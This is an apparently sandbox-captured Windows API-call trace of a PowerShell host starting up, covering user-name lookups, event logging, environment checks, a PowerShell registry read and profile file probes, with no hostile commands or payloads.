	[0789.154] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.154] SetErrorMode (uMode=0x1) returned 0x1
	[0789.154] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d120 | out: lpFileInformation=0x20d120*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.155] SetErrorMode (uMode=0x1) returned 0x1
	[0789.155] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.155] SetErrorMode (uMode=0x1) returned 0x1
	[0789.155] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.155] SetErrorMode (uMode=0x1) returned 0x1
	[0789.155] CoTaskMemAlloc (cb=0x804) returned 0x1b873a70
	[0789.156] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b873a70, nSize=0x20d5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5c8) returned 0x1
	[0789.156] CoTaskMemFree (pv=0x1b873a70) 
	[0789.156] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0789.156] GetUserNameW (in: lpBuffer=0x484760, pcbBuffer=0x20d608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d608) returned 1
	[0789.156] CoTaskMemFree (pv=0x484760) 
	[0789.157] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2df2860*="FileSystem", lpRawData=0x2df25f0) returned 1
	[0789.160] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0789.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.160] CoTaskMemFree (pv=0x43e1c0) 
	[0789.161] CoTaskMemAlloc (cb=0x804) returned 0x1b873a70
	[0789.161] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b873a70, nSize=0x20d5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5c8) returned 0x1
	[0789.161] CoTaskMemFree (pv=0x1b873a70) 
	[0789.161] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0789.162] GetUserNameW (in: lpBuffer=0x484760, pcbBuffer=0x20d608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d608) returned 1
	[0789.162] CoTaskMemFree (pv=0x484760) 
	[0789.162] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2df80a0*="Function", lpRawData=0x2df7e30) returned 1
	[0789.188] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0789.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.188] CoTaskMemFree (pv=0x43e1c0) 
	[0790.041] CoTaskMemAlloc (cb=0x804) returned 0x1b873a70
	[0790.042] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b873a70, nSize=0x20d5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5c8) returned 0x1
	[0790.042] CoTaskMemFree (pv=0x1b873a70) 
	[0790.042] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0790.042] GetUserNameW (in: lpBuffer=0x484760, pcbBuffer=0x20d608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d608) returned 1
	[0790.042] CoTaskMemFree (pv=0x484760) 
	[0790.043] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e1a8c8*="Registry", lpRawData=0x2e1a658) returned 1
	[0790.273] CoTaskMemAlloc (cb=0x804) returned 0x1b873a70
	[0790.273] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b873a70, nSize=0x20d5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5c8) returned 0x1
	[0790.274] CoTaskMemFree (pv=0x1b873a70) 
	[0790.274] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0790.274] GetUserNameW (in: lpBuffer=0x484760, pcbBuffer=0x20d608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d608) returned 1
	[0790.274] CoTaskMemFree (pv=0x484760) 
	[0790.274] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e1fce0*="Variable", lpRawData=0x2e1fa70) returned 1
	[0790.365] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0790.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.365] CoTaskMemFree (pv=0x43e1c0) 
	[0790.365] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0790.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.365] CoTaskMemFree (pv=0x43e1c0) 
	[0791.236] CoTaskMemAlloc (cb=0x804) returned 0x1b873a70
	[0791.236] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b873a70, nSize=0x20d5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5c8) returned 0x1
	[0791.237] CoTaskMemFree (pv=0x1b873a70) 
	[0791.237] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0791.237] GetUserNameW (in: lpBuffer=0x484760, pcbBuffer=0x20d608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d608) returned 1
	[0791.237] CoTaskMemFree (pv=0x484760) 
	[0791.238] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e338f8*="Certificate", lpRawData=0x2e33688) returned 1
	[0792.066] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0792.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.066] CoTaskMemFree (pv=0x43e1c0) 
	[0792.070] GetLogicalDrives () returned 0x4
	[0792.070] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20d250, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0792.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0792.071] CoTaskMemAlloc (cb=0x20e) returned 0x4d68b0
	[0792.071] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x4d68b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0792.072] CoTaskMemFree (pv=0x4d68b0) 
	[0792.073] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0792.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.073] CoTaskMemFree (pv=0x43e1c0) 
	[0792.073] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0792.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.074] CoTaskMemFree (pv=0x43e1c0) 
	[0792.091] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0792.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.091] CoTaskMemFree (pv=0x43e1c0) 
	[0792.092] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0792.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.092] CoTaskMemFree (pv=0x43e1c0) 
	[0792.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0792.093] SetErrorMode (uMode=0x1) returned 0x1
	[0792.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d210 | out: lpFileInformation=0x20d210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.514] SetErrorMode (uMode=0x1) returned 0x1
	[0793.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.514] SetErrorMode (uMode=0x1) returned 0x1
	[0793.514] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d210 | out: lpFileInformation=0x20d210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.514] SetErrorMode (uMode=0x1) returned 0x1
	[0793.515] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0793.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.515] CoTaskMemFree (pv=0x43e1c0) 
	[0793.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.519] SetErrorMode (uMode=0x1) returned 0x1
	[0793.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d4d0 | out: lpFileInformation=0x20d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.519] SetErrorMode (uMode=0x1) returned 0x1
	[0793.533] CoTaskMemAlloc (cb=0x804) returned 0x1b873a70
	[0793.533] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b873a70, nSize=0x20d838 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d838) returned 0x1
	[0793.534] CoTaskMemFree (pv=0x1b873a70) 
	[0793.534] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0793.534] GetUserNameW (in: lpBuffer=0x484760, pcbBuffer=0x20d878 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d878) returned 1
	[0793.534] CoTaskMemFree (pv=0x484760) 
	[0793.534] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e6c5e0*="Available", lpRawData=0x2e6c370) returned 1
	[0794.503] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0794.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.503] CoTaskMemFree (pv=0x43e1c0) 
	[0794.504] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0794.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.504] CoTaskMemFree (pv=0x43e1c0) 
	[0794.514] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0794.514] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0794.514] CoTaskMemFree (pv=0x43e1c0) 
	[0794.514] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0794.514] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0794.514] CoTaskMemFree (pv=0x43e1c0) 
	[0794.516] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d858 | out: phkResult=0x20d858*=0x380) returned 0x0
	[0794.517] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d7dc, lpData=0x0, lpcbData=0x20d7d8*=0x0 | out: lpType=0x20d7dc*=0x1, lpData=0x0, lpcbData=0x20d7d8*=0x56) returned 0x0
	[0794.517] CoTaskMemAlloc (cb=0x5a) returned 0x1b8566d0
	[0794.517] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d7ac, lpData=0x1b8566d0, lpcbData=0x20d7a8*=0x56 | out: lpType=0x20d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d7a8*=0x56) returned 0x0
	[0794.517] CoTaskMemFree (pv=0x1b8566d0) 
	[0794.517] RegCloseKey (hKey=0x380) returned 0x0
	[0794.518] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0794.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.518] CoTaskMemFree (pv=0x43e1c0) 
	[0795.696] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0795.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.696] CoTaskMemFree (pv=0x43e1c0) 
	[0795.702] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0795.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.702] CoTaskMemFree (pv=0x43e1c0) 
	[0795.702] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0795.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.703] CoTaskMemFree (pv=0x43e1c0) 
	[0795.703] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0795.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.703] CoTaskMemFree (pv=0x43e1c0) 
	[0795.704] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0795.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.704] CoTaskMemFree (pv=0x43e1c0) 
	[0795.706] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0795.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.706] CoTaskMemFree (pv=0x43e1c0) 
	[0795.707] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0795.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.707] CoTaskMemFree (pv=0x43e1c0) 
	[0799.703] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0799.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.704] CoTaskMemFree (pv=0x43e1c0) 
	[0801.506] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x43e600
	[0801.508] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x43e710
	[0805.324] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0805.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.324] CoTaskMemFree (pv=0x43e820) 
	[0805.326] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0805.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.326] CoTaskMemFree (pv=0x43e820) 
	[0806.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0806.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0806.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0806.306] VirtualQuery (in: lpAddress=0x20bb60, lpBuffer=0x20ca20, dwLength=0x30 | out: lpBuffer=0x20ca20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0806.312] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d9b8 | out: phkResult=0x20d9b8*=0x38c) returned 0x0
	[0806.312] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d93c, lpData=0x0, lpcbData=0x20d938*=0x0 | out: lpType=0x20d93c*=0x1, lpData=0x0, lpcbData=0x20d938*=0x56) returned 0x0
	[0806.312] CoTaskMemAlloc (cb=0x5a) returned 0x1b875cd0
	[0806.312] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d90c, lpData=0x1b875cd0, lpcbData=0x20d908*=0x56 | out: lpType=0x20d90c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d908*=0x56) returned 0x0
	[0806.312] CoTaskMemFree (pv=0x1b875cd0) 
	[0806.312] RegCloseKey (hKey=0x38c) returned 0x0
	[0806.313] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d9b8 | out: phkResult=0x20d9b8*=0x38c) returned 0x0
	[0806.313] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d93c, lpData=0x0, lpcbData=0x20d938*=0x0 | out: lpType=0x20d93c*=0x1, lpData=0x0, lpcbData=0x20d938*=0x56) returned 0x0
	[0806.313] CoTaskMemAlloc (cb=0x5a) returned 0x1b875cd0
	[0806.313] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d90c, lpData=0x1b875cd0, lpcbData=0x20d908*=0x56 | out: lpType=0x20d90c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d908*=0x56) returned 0x0
	[0806.313] CoTaskMemFree (pv=0x1b875cd0) 
	[0806.313] RegCloseKey (hKey=0x38c) returned 0x0
	[0806.313] CoTaskMemAlloc (cb=0x20c) returned 0x1b84a970
	[0806.313] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b84a970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0806.313] CoTaskMemFree (pv=0x1b84a970) 
	[0806.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0806.314] CoTaskMemAlloc (cb=0x20c) returned 0x1b84a970
	[0806.314] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b84a970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0806.314] CoTaskMemFree (pv=0x1b84a970) 
	[0806.314] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0806.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x20d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0806.315] SetErrorMode (uMode=0x1) returned 0x1
	[0806.315] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d920 | out: lpFileInformation=0x20d920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0806.315] SetErrorMode (uMode=0x1) returned 0x1
	[0806.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x20d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0806.315] SetErrorMode (uMode=0x1) returned 0x1
	[0806.315] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d920 | out: lpFileInformation=0x20d920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0806.315] SetErrorMode (uMode=0x1) returned 0x1
	[0806.315] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x20d710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0806.315] SetErrorMode (uMode=0x1) returned 0x1
	[0806.316] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d920 | out: lpFileInformation=0x20d920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0806.316] SetErrorMode (uMode=0x1) returned 0x1
	[0806.316] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x20d710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0806.316] SetErrorMode (uMode=0x1) returned 0x1
	[0806.316] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d920 | out: lpFileInformation=0x20d920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0806.316] SetErrorMode (uMode=0x1) returned 0x1
	[0806.317] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0806.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.317] CoTaskMemFree (pv=0x43e820) 
	[0806.317] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0806.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
